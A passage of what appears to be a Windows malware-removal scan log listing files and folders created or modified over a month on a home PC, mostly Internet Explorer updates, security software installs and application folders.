2014-12-13 09:41 - 2014-12-13 09:41 - 00147968 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-12-13 09:41 - 2014-12-13 09:41 - 00143872 _____ (Microsoft Corporation) C:\Windows\system32\wextract.exe
2014-12-13 09:41 - 2014-12-13 09:41 - 00139264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wextract.exe
2014-12-13 09:41 - 2014-12-13 09:41 - 00135680 _____ (Microsoft Corporation) C:\Windows\system32\iepeers.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00131072 _____ (Microsoft Corporation) C:\Windows\system32\IEAdvpack.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00127488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\occache.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00116736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iepeers.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2014-12-13 09:41 - 2014-12-13 09:41 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-12-13 09:41 - 2014-12-13 09:41 - 00111616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\IEAdvpack.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00105984 _____ (Microsoft Corporation) C:\Windows\system32\iesysprep.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00101376 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00090112 _____ (Microsoft Corporation) C:\Windows\system32\SetIEInstalledDate.exe
2014-12-13 09:41 - 2014-12-13 09:41 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00086016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesysprep.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00086016 _____ (Microsoft Corporation) C:\Windows\system32\RegisterIEPKEYs.exe
2014-12-13 09:41 - 2014-12-13 09:41 - 00083456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inseng.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00081408 _____ (Microsoft Corporation) C:\Windows\system32\icardie.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00077312 _____ (Microsoft Corporation) C:\Windows\system32\tdc.ocx
2014-12-13 09:41 - 2014-12-13 09:41 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00074240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SetIEInstalledDate.exe
2014-12-13 09:41 - 2014-12-13 09:41 - 00071680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\RegisterIEPKEYs.exe
2014-12-13 09:41 - 2014-12-13 09:41 - 00069120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\icardie.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tdc.ocx
2014-12-13 09:41 - 2014-12-13 09:41 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\pngfilt.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00056832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\pngfilt.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00052224 _____ (Microsoft Corporation) C:\Windows\system32\msfeedsbs.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00048640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmler.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\mshtmler.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00048128 _____ (Microsoft Corporation) C:\Windows\system32\imgutil.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeedsbs.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\imgutil.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00030208 _____ (Microsoft Corporation) C:\Windows\system32\licmgr10.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00024576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\licmgr10.dll
2014-12-13 09:41 - 2014-12-13 09:41 - 00013824 _____ (Microsoft Corporation) C:\Windows\system32\mshta.exe
2014-12-13 09:41 - 2014-12-13 09:41 - 00013312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshta.exe
2014-12-13 09:41 - 2014-12-13 09:41 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\msfeedssync.exe
2014-12-13 09:41 - 2014-12-13 09:41 - 00012800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeedssync.exe
2014-12-13 09:41 - 2014-12-13 09:41 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-12-13 09:36 - 2014-12-13 09:43 - 00007657 _____ () C:\Windows\IE11_main.log
2014-12-13 09:34 - 2012-08-23 09:13 - 00243200 _____ (Microsoft Corporation) C:\Windows\system32\rdpudd.dll
2014-12-13 09:34 - 2012-08-23 09:10 - 00019456 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpvideominiport.sys
2014-12-13 09:34 - 2012-08-23 06:12 - 00192000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rdpendp_winip.dll
2014-12-13 09:34 - 2012-08-23 05:51 - 00228864 _____ (Microsoft Corporation) C:\Windows\system32\rdpendp_winip.dll
2014-12-13 09:30 - 2014-12-13 09:34 - 00003397 _____ () C:\Windows\IE9_main.log
2014-12-13 09:29 - 2014-07-02 12:44 - 00609240 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvStreaming.exe
2014-12-13 09:29 - 2014-07-02 05:14 - 03826628 _____ () C:\Windows\system32\nvcoproc.bin
2014-12-13 08:56 - 2014-12-13 08:56 - 00111016 _____ (Oracle Corporation) C:\Windows\system32\WindowsAccessBridge-64.dll
2014-12-13 08:56 - 2014-12-13 08:56 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2014-12-13 08:48 - 2012-05-04 18:29 - 00772504 _____ (Oracle Corporation) C:\Windows\SysWOW64\npDeployJava1.dll
2014-12-13 08:48 - 2012-05-04 18:29 - 00687504 _____ (Oracle Corporation) C:\Windows\SysWOW64\deployJava1.dll
2014-12-13 08:41 - 2014-12-13 08:41 - 00000000 ____D () C:\Program Files\Java
2014-12-13 08:39 - 2014-12-13 08:41 - 92658088 _____ (Oracle Corporation) C:\Users\Chris\Downloads\jre-8u25-windows-x64.exe
2014-12-13 08:38 - 2014-12-13 08:38 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome
2014-12-13 08:08 - 2014-12-13 08:08 - 00000110 _____ () C:\Windows\wininit.ini
2014-12-13 07:28 - 2014-12-13 07:28 - 00000000 ____D () C:\SUPERDelete
2014-12-13 07:19 - 2014-12-13 07:19 - 00000000 ____D () C:\Users\Chris\Documents\PcSetup
2014-12-13 07:17 - 2014-12-13 07:17 - 00000000 ____D () C:\Windows\System32\Tasks\Safer-Networking
2014-12-13 07:16 - 2014-12-13 08:08 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy
2014-12-13 07:16 - 2014-12-13 07:20 - 00000000 ____D () C:\Program Files (x86)\Spybot - Search & Destroy 2
2014-12-13 07:16 - 2014-12-13 07:17 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 2
2014-12-13 07:16 - 2014-12-13 07:16 - 00001395 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk
2014-12-13 07:16 - 2014-12-13 07:16 - 00001383 _____ () C:\Users\Public\Desktop\Spybot-S&D Start Center.lnk
2014-12-13 07:16 - 2013-09-20 10:49 - 00021040 _____ (Safer Networking Limited) C:\Windows\system32\sdnclean64.exe
2014-12-13 07:11 - 2014-12-16 05:51 - 00000000 ____D () C:\Program Files\SUPERAntiSpyware
2014-12-13 07:11 - 2014-12-13 07:12 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SUPERAntiSpyware
2014-12-13 07:11 - 2014-12-13 07:11 - 00001808 _____ () C:\Users\Public\Desktop\SUPERAntiSpyware Professional.lnk
2014-12-13 07:11 - 2014-12-13 07:11 - 00000000 ____D () C:\Users\Chris\AppData\Roaming\SUPERAntiSpyware.com
2014-12-13 07:11 - 2014-12-13 07:11 - 00000000 ____D () C:\ProgramData\SUPERAntiSpyware.com
2014-12-13 07:04 - 2014-12-13 07:04 - 00000000 ____D () C:\Users\Chris\AppData\Roaming\J River
2014-12-13 07:03 - 2014-12-13 07:04 - 20686424 _____ (SUPERAntiSpyware) C:\Users\Chris\Downloads\SUPERAntiSpyware.exe
2014-12-13 06:52 - 2014-12-15 16:44 - 00000000 ____D () C:\Windows\pss
2014-12-12 18:02 - 2014-12-16 05:51 - 00409948 _____ () C:\Windows\WindowsUpdate.log
2014-12-12 17:59 - 2014-12-15 16:46 - 00000784 _____ () C:\Windows\setupact.log
2014-12-12 17:59 - 2014-12-12 17:59 - 00000000 _____ () C:\Windows\setuperr.log
2014-12-12 07:49 - 2014-12-15 16:42 - 00015766 _____ () C:\Windows\PFRO.log
2014-12-11 23:05 - 2014-12-11 23:05 - 00002083 _____ () C:\Users\Public\Desktop\Kaspersky Anti-Virus.lnk
2014-12-11 23:05 - 2014-12-11 23:05 - 00000000 ____D () C:\Windows\ELAMBKUP
2014-12-11 23:05 - 2014-12-11 23:05 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Kaspersky Anti-Virus
2014-12-11 23:05 - 2014-12-11 23:05 - 00000000 ____D () C:\Program Files (x86)\Kaspersky Lab
2014-12-11 23:05 - 2013-05-06 09:13 - 00110176 _____ (Kaspersky Lab ZAO) C:\Windows\system32\klfphc.dll
2014-12-11 23:04 - 2014-08-12 18:33 - 00246456 _____ (Kaspersky Lab ZAO) C:\Windows\system32\Drivers\klhk.sys
2014-12-11 22:49 - 2014-12-15 18:06 - 00000000 ____D () C:\ProgramData\Kaspersky Lab
2014-12-11 19:47 - 2014-12-12 18:25 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-12-11 19:46 - 2014-12-11 19:46 - 00001106 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-12-11 19:46 - 2014-12-11 19:46 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-12-11 19:46 - 2014-11-21 06:14 - 00093400 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-12-11 19:46 - 2014-11-21 06:14 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-12-10 20:00 - 2014-12-10 20:00 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Samsung SSD Magician
2014-12-10 19:27 - 2014-12-10 19:27 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2014-12-10 19:26 - 2014-12-10 19:26 - 00000000 ____D () C:\Program Files\Microsoft Silverlight
2014-12-10 19:26 - 2014-12-10 19:26 - 00000000 ____D () C:\Program Files (x86)\Microsoft Silverlight
2014-12-10 06:57 - 2014-12-10 06:57 - 00000000 ____D () C:\Windows\system32\appraiser
2014-12-09 22:38 - 2014-10-17 21:05 - 04121600 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2014-12-09 22:38 - 2014-10-17 20:33 - 03209728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf.dll
2014-12-09 22:38 - 2014-07-06 21:06 - 00206848 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll
2014-12-09 22:38 - 2014-07-06 21:06 - 00055808 _____ (Microsoft Corporation) C:\Windows\system32\rrinstaller.exe
2014-12-09 22:38 - 2014-07-06 21:06 - 00024576 _____ (Microsoft Corporation) C:\Windows\system32\mfpmp.exe
2014-12-09 22:38 - 2014-07-06 21:02 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\mferror.dll
2014-12-09 22:38 - 2014-07-06 20:40 - 00103424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfps.dll
2014-12-09 22:38 - 2014-07-06 20:39 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rrinstaller.exe
2014-12-09 22:38 - 2014-07-06 20:39 - 00023040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfpmp.exe
2014-12-09 22:38 - 2014-07-06 20:37 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mferror.dll
2014-12-09 17:30 - 2014-12-09 17:30 - 00000000 ____D () C:\ProgramData\Avg_Update_1214tb
2014-12-09 13:30 - 2014-12-03 21:50 - 00830976 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2014-12-09 13:30 - 2014-12-03 21:50 - 00741376 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2014-12-09 13:30 - 2014-12-03 21:50 - 00413184 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2014-12-09 13:30 - 2014-12-03 21:50 - 00396800 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2014-12-09 13:30 - 2014-12-03 21:50 - 00227328 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-12-09 13:30 - 2014-12-03 21:50 - 00192000 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll
2014-12-09 13:30 - 2014-12-03 21:44 - 01083392 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-12-09 13:30 - 2014-12-01 18:28 - 01232040 _____ (Microsoft Corporation) C:\Windows\system32\aitstatic.exe
2014-12-09 13:30 - 2014-11-10 22:09 - 01424384 _____ (Microsoft Corporation) C:\Windows\system32\WindowsCodecs.dll
2014-12-09 13:30 - 2014-11-10 21:44 - 01230336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WindowsCodecs.dll
2014-12-09 13:30 - 2014-11-10 20:46 - 00119296 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tdx.sys
2014-12-09 13:29 - 2014-11-07 22:16 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2014-12-09 13:29 - 2014-11-07 21:45 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll
2014-12-09 13:29 - 2014-10-29 21:03 - 00165888 _____ (Microsoft Corporation) C:\Windows\system32\charmap.exe
2014-12-09 13:29 - 2014-10-29 20:45 - 00155136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\charmap.exe
2014-12-09 13:29 - 2014-10-02 21:12 - 02020352 _____ (Microsoft Corporation) C:\Windows\system32\WsmSvc.dll
2014-12-09 13:29 - 2014-10-02 21:12 - 00346624 _____ (Microsoft Corporation) C:\Windows\system32\WSManMigrationPlugin.dll
2014-12-09 13:29 - 2014-10-02 21:12 - 00310272 _____ (Microsoft Corporation) C:\Windows\system32\WsmWmiPl.dll
2014-12-09 13:29 - 2014-10-02 21:12 - 00181248 _____ (Microsoft Corporation) C:\Windows\system32\WsmAuto.dll
2014-12-09 13:29 - 2014-10-02 21:11 - 00266240 _____ (Microsoft Corporation) C:\Windows\system32\WSManHTTPConfig.exe
2014-12-09 13:29 - 2014-10-02 20:45 - 01177088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmSvc.dll
2014-12-09 13:29 - 2014-10-02 20:45 - 00248832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WSManMigrationPlugin.dll
2014-12-09 13:29 - 2014-10-02 20:45 - 00214016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmWmiPl.dll
2014-12-09 13:29 - 2014-10-02 20:45 - 00145920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmAuto.dll
2014-12-09 13:29 - 2014-10-02 20:44 - 00198656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WSManHTTPConfig.exe
2014-12-06 07:41 - 2014-12-06 08:45 - 00000000 ____D () C:\Users\Chris\Desktop\Child Care
2014-12-05 08:29 - 2014-12-05 08:29 - 00000000 ____D () C:\Users\Chris\AppData\Local\{6D03B67E-B190-4D63-909C-23B037963DAF}
2014-12-03 22:06 - 2014-12-03 22:06 - 00000000 __SHD () C:\Users\Chris\AppData\Local\EmieBrowserModeList
2014-12-03 21:57 - 2014-11-07 13:39 - 00000000 ____D () C:\Users\Chris\Desktop\mricrogl
2014-11-29 14:21 - 2014-11-29 14:21 - 00000000 ____D () C:\Users\Chris\AppData\Local\{F90F4DEB-195B-453B-817C-C3825431B3D0}
2014-11-25 16:55 - 2014-11-25 16:55 - 00000000 ____D () C:\Users\Chris\AppData\Local\{37A3466C-5BD0-4F27-B793-690772C0A43F}
2014-11-21 08:26 - 2014-11-21 08:26 - 00000000 ____D () C:\Program Files (x86)\LG Electronics
2014-11-21 08:26 - 2014-11-21 08:26 - 00000000 ____D () C:\LGMobileUpgrade
2014-11-20 17:36 - 2014-12-08 18:45 - 00000799 _____ () C:\Users\Kids\Desktop\▶ 3 Hours of Christmas Music Classics and Holiday Scenery - YouTube.website
2014-11-20 10:00 - 2014-11-20 10:00 - 00001176 _____ () C:\Users\Chris\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Remote Desktop Connection.lnk
2014-11-20 10:00 - 2014-11-20 10:00 - 00001151 _____ () C:\Users\Chris\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WFUBMC Intranet Apps.lnk
2014-11-20 07:51 - 2014-11-20 07:52 - 00004625 _____ () C:\Windows\SysWOW64\jupdate-1.7.0_71-b14.log
2014-11-20 00:55 - 2014-11-20 00:55 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG
2014-11-18 19:09 - 2014-12-11 22:26 - 00000000 ____D () C:\Program Files (x86)\YTD Toolbar
2014-11-18 16:50 - 2014-11-10 22:08 - 00728064 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2014-11-18 16:50 - 2014-11-10 22:08 - 00241152 _____ (Microsoft Corporation) C:\Windows\system32\pku2u.dll
2014-11-18 16:50 - 2014-11-10 21:44 - 00550912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2014-11-18 16:50 - 2014-11-10 21:44 - 00186880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\pku2u.dll
2014-11-18 14:56 - 2014-11-18 14:56 - 01202848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\FM20.DLL
==================== One Month Modified Files and Folders =======
(If an entry is included in the fixlist, the file\folder will be moved.)
2014-12-16 05:52 - 2012-02-25 12:29 - 00000898 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-12-16 05:51 - 2013-06-21 15:50 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-12-15 19:50 - 2014-06-14 06:18 - 00000535 _____ () C:\Users\Kids\Desktop\Netflix.website
2014-12-15 18:06 - 2014-04-01 13:44 - 00000000 ____D () C:\Users\Kids\AppData\Roaming\Adobe
2014-12-15 18:06 - 2012-02-25 12:29 - 00000894 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-12-15 16:54 - 2009-07-14 00:13 - 00786662 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-12-15 16:54 - 2009-07-13 23:45 - 00025232 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-12-15 16:54 - 2009-07-13 23:45 - 00025232 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-12-15 16:53 - 2013-10-30 04:44 - 00000000 ___RD () C:\Users\Chris\SkyDrive
2014-12-15 16:53 - 2009-12-13 08:56 - 00000000 ____D () C:\Users\Chris\Tracing
2014-12-15 16:46 - 2009-12-10 18:10 - 00000000 ____D () C:\ProgramData\NVIDIA
2014-12-15 16:46 - 2009-07-14 00:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-12-15 14:48 - 2011-07-05 08:47 - 00007601 _____ () C:\Users\Chris\AppData\Local\Resmon.ResmonCfg
2014-12-15 14:20 - 2010-01-14 20:40 - 00003922 _____ () C:\Windows\System32\Tasks\User_Feed_Synchronization-{9C149FD5-FBFB-41B9-BAEC-1FE8FC89AEEB}
2014-12-15 14:15 - 2012-09-27 06:02 - 00004096 ___SH () C:\VSNAP.IDX
2014-12-15 14:15 - 2010-10-12 18:00 - 00000000 ____D () C:\ProgramData\MFAData
2014-12-15 14:14 - 2009-12-13 09:02 - 00000000 ____D () C:\Users\Chris\AppData\Roaming\Skype
2014-12-14 23:37 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\registration
2014-12-14 08:53 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\rescache
2014-12-13 11:14 - 2014-04-03 07:07 - 00115640 _____ () C:\Users\Kids\AppData\Local\GDIPFONTCACHEV1.DAT
2014-12-13 11:12 - 2014-04-02 15:56 - 00000000 ____D () C:\Users\Kids\AppData\Local\Google
2014-12-13 10:51 - 2013-06-21 13:57 - 00001417 _____ () C:\Users\Chris\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2014-12-13 10:40 - 2009-07-13 22:20 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories
2014-12-13 10:38 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\PolicyDefinitions
2014-12-13 09:30 - 2009-12-10 18:10 - 00000000 ____D () C:\Program Files (x86)\NVIDIA Corporation
2014-12-13 09:30 - 2009-12-10 18:08 - 00000000 ____D () C:\Program Files\NVIDIA Corporation
2014-12-13 09:29 - 2012-10-04 14:20 - 00000000 ____D () C:\Temp
2014-12-13 08:46 - 2010-08-13 20:48 - 02932736 ___SH () C:\Users\Chris\Desktop\Thumbs.db
2014-12-13 08:42 - 2013-11-23 19:28 - 00000000 ____D () C:\ProgramData\Oracle
2014-12-13 08:38 - 2010-03-09 21:21 - 00000000 ____D () C:\Program Files (x86)\Google
2014-12-13 08:37 - 2011-02-15 16:11 - 00000000 ____D () C:\Users\Chris\AppData\Local\Deployment
2014-12-13 08:11 - 2012-10-04 14:20 - 00000000 ____D () C:\Program Files (x86)\Motorola Mobility
2014-12-13 08:11 - 2009-12-09 23:21 - 00000000 ____D () C:\Windows\Panther
2014-12-13 08:11 - 2009-07-13 23:45 - 03056544 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-12-13 07:24 - 2010-03-09 21:21 - 00000000 ____D () C:\Users\Chris\AppData\Local\Google
2014-12-13 07:19 - 2013-12-24 14:12 - 00000000 ____D () C:\ProgramData\VSO
2014-12-13 07:19 - 2013-12-24 14:12 - 00000000 ____D () C:\Program Files (x86)\VSO
2014-12-13 07:19 - 2009-12-30 21:00 - 00000055 _____ () C:\Users\Chris\AppData\Roaming\pcouffin.log
2014-12-13 07:19 - 2009-12-30 20:59 - 00099384 _____ () C:\Users\Chris\AppData\Roaming\inst.exe
2014-12-13 07:19 - 2009-12-30 20:59 - 00082816 _____ (VSO Software) C:\Users\Chris\AppData\Roaming\pcouffin.sys
2014-12-13 07:19 - 2009-12-30 20:59 - 00007859 _____ () C:\Users\Chris\AppData\Roaming\pcouffin.cat
2014-12-13 07:19 - 2009-12-30 20:59 - 00000000 ____D () C:\Users\Chris\AppData\Roaming\Vso
2014-12-13 07:15 - 2009-12-09 23:58 - 00115640 _____ () C:\Users\Chris\AppData\Local\GDIPFONTCACHEV1.DAT
2014-12-13 07:14 - 2010-08-17 13:38 - 00000000 ____D () C:\Users\Chris\AppData\Roaming\SanDisk
2014-12-13 07:11 - 2010-01-09 09:33 - 00000000 ____D () C:\ProgramData\Rosetta Stone
2014-12-13 07:10 - 2011-02-17 20:20 - 00000000 ____D () C:\Program Files\Tracker Software
2014-12-13 07:09 - 2013-11-10 08:30 - 00000000 ____D () C:\Users\Chris\Documents\Musicnotes
2014-12-13 07:09 - 2009-12-10 06:48 - 00000000 ___HD () C:\Program Files (x86)\InstallShield Installation Information
2014-12-13 07:08 - 2012-11-23 15:30 - 00000005 _____ () C:\Windows\SysWOW64\lMMLDeleteUserData42107612FX.tmp
2014-12-13 07:08 - 2012-10-04 14:20 - 00000000 ____D () C:\ProgramData\Nero
2014-12-13 07:08 - 2012-10-04 14:19 - 00000000 ____D () C:\Users\Chris\AppData\Roaming\Motorola
2014-12-13 07:08 - 2010-07-16 20:47 - 00000000 ____D () C:\Program Files (x86)\Motorola
2014-12-13 06:58 - 2009-12-17 04:05 - 00000000 ____D () C:\Program Files (x86)\Garmin GPS Plugin
2014-12-13 06:57 - 2012-06-11 18:53 - 00000000 ____D () C:\Program Files (x86)\CDBurnerXP
2014-12-13 06:56 - 2013-06-23 06:27 - 00000000 ____D () C:\AQi
2014-12-13 06:55 - 2009-12-10 21:46 - 00000000 ____D () C:\Users\Chris\AppData\Roaming\uTorrent
2014-12-12 07:49 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\Globalization
2014-12-12 07:39 - 2011-08-04 15:08 - 00000000 ____D () C:\Windows\Minidump
2014-12-11 23:09 - 2014-08-20 18:04 - 00818888 _____ (Kaspersky Lab ZAO) C:\Windows\system32\Drivers\klif.sys
2014-12-11 23:09 - 2014-08-18 14:43 - 00150536 _____ (Kaspersky Lab ZAO) C:\Windows\system32\Drivers\klflt.sys
2014-12-11 23:09 - 2014-08-13 19:34 - 00077512 _____ (Kaspersky Lab ZAO) C:\Windows\system32\Drivers\klwtp.sys
2014-12-11 22:42 - 2014-04-02 15:57 - 00000000 ____D () C:\Users\Kids\AppData\Roaming\Orbit
2014-12-11 22:42 - 2012-11-30 09:16 - 00000000 ____D () C:\Program Files (x86)\Orbitdownloader
2014-12-11 22:42 - 2012-11-30 09:15 - 00000000 ____D () C:\Users\Chris\AppData\Roaming\Orbit
2014-12-11 22:27 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\IME
2014-12-11 20:10 - 2014-04-01 13:44 - 00000000 ____D () C:\Users\Kids\AppData\Local\Avg2013
2014-12-11 19:56 - 2014-02-14 16:20 - 00000000 ____D () C:\Users\Chris\AppData\Roaming\Search Protection
2014-12-11 19:46 - 2012-12-02 22:19 - 00000000 ____D () C:\Program Files (x86)\MALWAREBYTES ANTI-MALWARE
2014-12-11 19:46 - 2010-03-01 18:43 - 00000000 ____D () C:\Users\Chris\AppData\Roaming\Malwarebytes
2014-12-11 19:46 - 2010-03-01 18:43 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-12-11 19:46 - 2010-03-01 18:43 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes' Anti-Malware
2014-12-10 20:06 - 2014-10-25 06:24 - 00002441 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader XI.lnk
2014-12-10 20:01 - 2014-08-04 05:54 - 00003256 _____ () C:\Windows\System32\Tasks\SamsungMagician
2014-12-10 20:01 - 2014-02-02 08:28 - 00000000 ____D () C:\Program Files (x86)\Samsung SSD Magician
2014-12-10 06:57 - 2014-05-08 22:05 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-12-10 06:57 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\AppCompat
2014-12-09 22:45 - 2009-12-12 20:11 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-12-09 22:44 - 2013-08-15 02:00 - 00000000 ____D () C:\Windows\system32\MRT
2014-12-09 22:40 - 2009-12-09 20:52 - 112710672 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
